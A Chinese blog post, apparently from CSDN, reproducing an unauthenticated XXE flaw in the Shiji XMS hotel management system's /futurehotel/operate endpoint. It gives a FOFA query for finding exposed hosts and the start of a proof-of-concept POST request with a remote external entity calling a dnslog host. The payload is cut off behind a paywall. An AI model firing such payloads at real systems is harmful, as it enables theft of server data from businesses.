西软云XMS futurehotel/operate XXE漏洞复现

已于 2024-02-29 22:51:29 修改
阅读量633 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-02-29 22:51:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136383199
版权

0x01 产品简介

西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。

0x02 漏洞复现

西软云XMS /XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。

0x03 复现环境

FOFA:app="shiji-西软云XMS"

0x04 漏洞复现

PoC

POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://xxx.dnslog.cn">
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
XMS3.3.0云餐饮操作说明书.pdf
05-27
西软餐饮操作手册
漏洞复现西软云XMS反序列化漏洞
weixin_45530380的博客
01-03 834
【代码】【漏洞复现西软云XMS反序列化漏洞
西软云XMS operate XXE漏洞
weixin_52204925的博客
02-29 720
西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
西软云XMS futurehotel/query XXE漏洞复现
0xSec
02-29 507
西软云XMS/XopServerRS/rest/futurehotel/query接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
西软云XMS-futurehotel/operate-XXE漏洞
cobra_cobra的博客
03-01 185
西软云XMS /XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。FOFA:app="shiji-西软云XMS"
西软Smart版餐饮用户手册
02-05
西软Smart版餐饮用户手册,西软Smart版餐饮用户手册
林锐 C/C++编程
04-08
林锐写的书,很经典。推荐大家看一下。里面讲解了c/c++编程技巧和内存的管理等。
魔方PPT模板01-极致简约时尚学术答辩模板.pptx
08-17
魔方PPT模板01-极致简约时尚学术答辩模板.pptx
openssl 1.1.1g 安装包
04-17
openssl 1.1.1g 安装包
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 359
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 920
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 463
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
Web应用防火墙的重要性
最新发布
XRY_XIAO的博客
05-20 346
Web应用防火墙的重要性
Llama 3 模型家族构建安全可信赖企业级AI应用之 Code Llama (一)
段智华的博客
05-17 858
1、Llama开源模型家族大模型技术、工具和多模态详解:学员将深入了解Meta Llama 3的创新之处,比如其在语言模型技术上的突破,并学习到如何在Llama 3中构建trust and safety AI。8、Llama 3中的DPO原理、算法、组件及具体实现及算法进阶:学习Llama 3中结合使用PPO和DPO算法,剖析DPO的原理和工作机制,详细解析DPO中的关键算法组件,并通过综合项目八从零开始动手实现和测试DPO算法,同时课程将解密DPO进阶技术Iterative DPO及IPO算法。
数智赋能内涝治理,四信城市排水防涝解决方案保障城市安全运行
rtu遥测终端机
05-20 305
四信城市排水防涝解决方案,采用先进的洪涝预测模型和智能监测设备,实现对城市内涝的精准预测和实时监控。方案通过智能化感知终端设备提升排水防涝智慧化水平,确保人民生命财产安全。四信的技术和服务已在多个城市内涝监测项目中得到应用,展现了其在城市安全运行保障方面的专业实力。
构建安全的GenAI/LLMs核心技术解密之大模型对抗攻击(五)
段智华的博客
05-16 27
构建安全的GenAI/LLMs核心技术解密之大模型对抗攻击(五)
西软云xms 反序列化
01-22
西软云XMS是一个云基础设施管理系统,其反序列化是指将已经串行化(序列化)的对象数据,重新转换为内存中的对象的过程。在西软云XMS中,反序列化是一个重要的功能,可以用于数据传输、持久化存储、跨系统通信等场景。 在西软云XMS中,反序列化的过程可以通过以下步骤实现: 首先,需要将已经序列化的数据进行传输或者存储。在传输时,可以通过网络传输协议(如HTTP、TCP/IP等)将数据传输给目标对象。在存储时,可以将数据写入到文件系统、数据库等持久化存储介质中。 接下来,接收方需要将接收到的序列化数据进行反序列化处理。在西软云XMS中,可以通过提供的反序列化接口或者方法来完成这一过程。反序列化接口会将接收到的数据进行解码,并根据序列化过程中的规则和约定,将数据重新转换为原始的对象数据。 最后,反序列化的结果将被存储在内存中的对象中,可以根据需要对这些对象进行进一步的操作和处理。在西软云XMS中,反序列化后的对象可以用于系统内部的数据处理、业务逻辑的执行、状态的恢复等方面。 总的来说,西软云XMS中的反序列化是一个将已序列化数据转换为内存中对象的过程,通过网络传输或者存储介质的数据读取,再通过反序列化接口将数据解码并转换为对象。这个过程在云基础设施管理系统中起到了重要的作用,用于实现数据的跨系统通信和持久化存储等功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值